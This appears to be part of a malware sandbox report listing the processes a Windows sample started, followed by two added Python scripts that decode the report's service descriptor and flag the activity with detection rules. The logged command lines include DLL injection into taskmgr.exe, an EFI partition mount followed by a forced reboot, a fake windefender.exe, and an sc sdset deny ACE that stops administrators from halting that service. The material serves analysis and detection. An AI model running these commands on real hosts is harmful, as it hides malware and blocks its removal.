                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:18
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /d
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:19
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:21
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:shutdown -r -t 5
                                                                                                  Imagebase:0xe40000
                                                                                                  File size:23552 bytes
                                                                                                  MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:21
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:26
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                  Imagebase:0x7ff7019b0000
                                                                                                  File size:288256 bytes
                                                                                                  MD5 hash:D98E33B66343E7C96158444127A117F6
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 14%, Metadefender, Browse
                                                                                                  • Detection: 73%, ReversingLabs

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\windefender.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\windefender.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2102272 bytes
                                                                                                  MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 29%, Metadefender, Browse
                                                                                                  • Detection: 79%, ReversingLabs

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                  Imagebase:0xd80000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:35
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                  Imagebase:0xca0000
                                                                                                  File size:60928 bytes
                                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
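
The sc sdset command above replaces the security descriptor of the WinDefender service with the SDDL string on its command line. The entry (D;;WPDT;;;BA) denies WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE) to Builtin Administrators, and the Administrators allow entry has the same two tokens removed, so an elevated operator can no longer stop or pause the service; that is what the "Suspicious Service DACL Modification" signature keys on. The following Python, an added example that is not part of the report, decodes the descriptor and reports those changes. The baseline it compares against is the usual descriptor of a freshly created service and is an assumption of the example; the parser covers the D: and S: sections only and does not expand group membership.

```python
import re
from dataclasses import dataclass

# Service-object access rights as abbreviated in SDDL (constants from winsvc.h / winnt.h).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
# Well-known trustee abbreviations seen in service descriptors.
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "BU": "Users", "IU": "Interactive",
            "SU": "Service logon", "AU": "Authenticated Users", "WD": "Everyone"}
# The descriptor from the sc sdset command line in the report.
REPORT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Assumed baseline: the usual descriptor of a freshly created service.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
ADMIN_FULL_CONTROL = "CCDCLCSWRPWPDTLOCRSDRCWDWO"   # what Administrators hold on a default service


@dataclass(frozen=True)
class Ace:
    ace_type: str       # "A" allow, "D" deny, "AU" audit
    flags: str          # e.g. "FA" = audit failed access (an ACE flag, not a right)
    rights: frozenset   # two-letter right tokens
    trustee: str


def parse_rights(mask: str) -> frozenset:
    """Split a concatenated rights string such as 'CCLCSWRP' into two-letter tokens."""
    if len(mask) % 2:
        raise ValueError(f"odd-length rights mask: {mask!r}")
    tokens = [mask[i:i + 2] for i in range(0, len(mask), 2)]
    unknown = [t for t in tokens if t not in SERVICE_RIGHTS]
    if unknown:
        raise ValueError(f"unknown right(s) {unknown} in {mask!r}")
    return frozenset(tokens)


def parse_sddl(sddl: str) -> dict:
    """Return {'D': [Ace, ...], 'S': [Ace, ...]} for the DACL and SACL.
    O:/G: prefixes and ACL control flags (P, AI, AR) are skipped."""
    out = {"D": [], "S": []}
    for key, body in re.findall(r"([DS]):[A-Z]*((?:\([^()]*\))*)", sddl):
        for ace_str in re.findall(r"\(([^()]*)\)", body):
            fields = ace_str.split(";")
            if len(fields) != 6:
                raise ValueError(f"malformed ACE: ({ace_str})")
            ace_type, flags, rights, _obj, _inh_obj, trustee = fields
            out[key].append(Ace(ace_type, flags, parse_rights(rights), trustee))
    return out


def effective_rights(dacl: list, trustee: str) -> set:
    """Rights the trustee ends up with. ACEs are walked in order and the first ACE naming the
    trustee that mentions a right decides it, so a deny placed before an allow wins.
    Simplification: group membership is not expanded (BA is not also matched as AU or WD)."""
    decided = {}
    for ace in dacl:
        if ace.trustee != trustee or ace.ace_type not in ("A", "D"):
            continue
        for right in ace.rights:
            decided.setdefault(right, ace.ace_type == "A")
    return {right for right, allowed in decided.items() if allowed}


def review_service_sddl(sddl: str) -> list:
    """Flag explicit deny ACEs, rights Administrators have lost relative to the baseline,
    and high-impact rights handed to broad principals."""
    dacl = parse_sddl(sddl)["D"]
    findings = []
    for ace in dacl:
        if ace.ace_type == "D":
            who = TRUSTEES.get(ace.trustee, ace.trustee)
            findings.append(f"deny ACE removes {sorted(ace.rights)} from {who}")
    lost = parse_rights(ADMIN_FULL_CONTROL) - effective_rights(dacl, "BA")
    if lost:
        findings.append("Administrators lack " + ", ".join(SERVICE_RIGHTS[r] for r in sorted(lost)))
    for t in ("WD", "AU", "BU", "IU"):   # broad principals holding config/delete/DACL/owner rights
        loose = effective_rights(dacl, t) & {"DC", "SD", "WD", "WO"}
        if loose:
            findings.append(f"{TRUSTEES[t]} can {', '.join(SERVICE_RIGHTS[r] for r in sorted(loose))}")
    return findings


if __name__ == "__main__":
    for line in review_service_sddl(REPORT_SDDL):
        print(line)
```

Against the report's descriptor the review returns two findings (the deny ACE on Administrators, and the resulting loss of SERVICE_PAUSE_CONTINUE and SERVICE_STOP) and nothing for the baseline. To check a live host, feed the output of `sc sdshow <service>` to review_service_sddl; the SACL entry in the report (failed-access auditing for Everyone) is unchanged from the default and is parsed but not flagged.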

                                                                                                  General

                                                                                                  Start time:13:13:36
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\windefender.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\windefender.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2102272 bytes
                                                                                                  MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
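
Read as a sequence, the process list above is a short chain: the EFI system partition is mounted and dismounted twice (mountvol B: /s, mountvol B: /d), a reboot is requested (shutdown -r -t 5), injector.exe is started with the target name taskmgr.exe and a DLL from the user's Temp directory, a binary named windefender.exe runs from C:\Windows rather than System32, and its service descriptor is rewritten with sc sdset. Some of these steps are only suspicious together. The following Python, an added example that is not part of the report, replays constructed process-creation events carrying the report's command lines and start times through three per-event rules and one sequence rule; the trailing notepad.exe event and the allowlist of binaries expected directly under C:\Windows are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed process-creation events that mirror the command lines and start times in the
# report; the final notepad.exe event is a benign control added for the example.
EVENTS = [
    {"time": "13:13:09", "image": r"C:\Windows\SysWOW64\mountvol.exe", "cmd": "mountvol B: /s"},
    {"time": "13:13:09", "image": r"C:\Windows\SysWOW64\mountvol.exe", "cmd": "mountvol B: /d"},
    {"time": "13:13:15", "image": r"C:\Windows\SysWOW64\mountvol.exe", "cmd": "mountvol B: /s"},
    {"time": "13:13:18", "image": r"C:\Windows\SysWOW64\mountvol.exe", "cmd": "mountvol B: /d"},
    {"time": "13:13:21", "image": r"C:\Windows\SysWOW64\shutdown.exe", "cmd": "shutdown -r -t 5"},
    {"time": "13:13:33", "image": r"C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe",
     "cmd": r"C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe "
            r"C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll"},
    {"time": "13:13:33", "image": r"C:\Windows\windefender.exe", "cmd": r"C:\Windows\windefender.exe"},
    {"time": "13:13:35", "image": r"C:\Windows\SysWOW64\sc.exe",
     "cmd": "sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
            "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
            "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"},
    {"time": "13:13:40", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

# Assumption: a short allowlist of binaries that legitimately live directly under C:\Windows.
# Tune it against a clean image of your own build before deploying the rule.
WINDOWS_ROOT_ALLOWLIST = {"explorer.exe", "notepad.exe", "regedit.exe", "hh.exe", "write.exe",
                          "bfsvc.exe", "splwow64.exe", "winhlp32.exe", "helppane.exe"}


def _t(ev):
    return datetime.strptime(ev["time"], "%H:%M:%S")


def rule_windows_root_exe(ev):
    """Executable placed directly in the Windows root under a system-sounding name."""
    p = PureWindowsPath(ev["image"])
    if p.parent == PureWindowsPath(r"C:\Windows") and p.name.lower() not in WINDOWS_ROOT_ALLOWLIST:
        return f"executable in Windows root outside allowlist: {p.name}"


def rule_temp_dll_argument(ev):
    """A DLL under a user's Temp folder handed to a program on its command line (loader/injector)."""
    m = re.search(r"(\S+\\AppData\\Local\\Temp\\\S+\.dll)\b", ev["cmd"], re.IGNORECASE)
    if m:
        return f"DLL from user Temp passed as argument: {m.group(1)}"


def rule_service_dacl_deny(ev):
    """sc sdset writing a descriptor that contains an explicit deny ACE."""
    if re.search(r"\bsc(\.exe)?\s+sdset\b", ev["cmd"], re.IGNORECASE) and "(D;" in ev["cmd"]:
        return "sc sdset with an explicit deny ACE"


def rule_esp_mount_then_reboot(events, window=timedelta(minutes=5)):
    """mountvol <X>: /s mounts the EFI system partition; a reboot requested shortly afterwards is
    the shape of boot-level tampering and only shows up when the two events are correlated."""
    mounts = [_t(e) for e in events if re.search(r"\bmountvol\s+\w:\s*/s\b", e["cmd"], re.I)]
    hits = []
    for e in events:
        if not re.search(r"\bshutdown(\.exe)?\b.*\s[-/]r\b", e["cmd"], re.I):
            continue
        gaps = [_t(e) - m for m in mounts if timedelta(0) <= _t(e) - m <= window]
        if gaps:
            hits.append(f"{e['time']} reboot requested {int(min(gaps).total_seconds())}s "
                        f"after EFI system partition mount")
    return hits


def triage(events):
    """Run the per-event rules and the sequence rule; return one line per finding."""
    findings = []
    for ev in events:
        for rule in (rule_windows_root_exe, rule_temp_dll_argument, rule_service_dacl_deny):
            hit = rule(ev)
            if hit:
                findings.append(f"{ev['time']} {hit}")
    findings.extend(rule_esp_mount_then_reboot(events))
    return findings


if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

On the constructed events triage returns four findings: the Temp DLL argument to injector.exe, windefender.exe in the Windows root, the sc sdset deny ACE, and the reboot six seconds after the second EFI system partition mount. The per-event rules map onto the report's own signatures (System File Execution Location Anomaly, thread injection, Service DACL Modification); the sequence rule is the one worth adding to an EDR query, since mountvol /s on its own is routine for firmware and boot-repair tooling.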
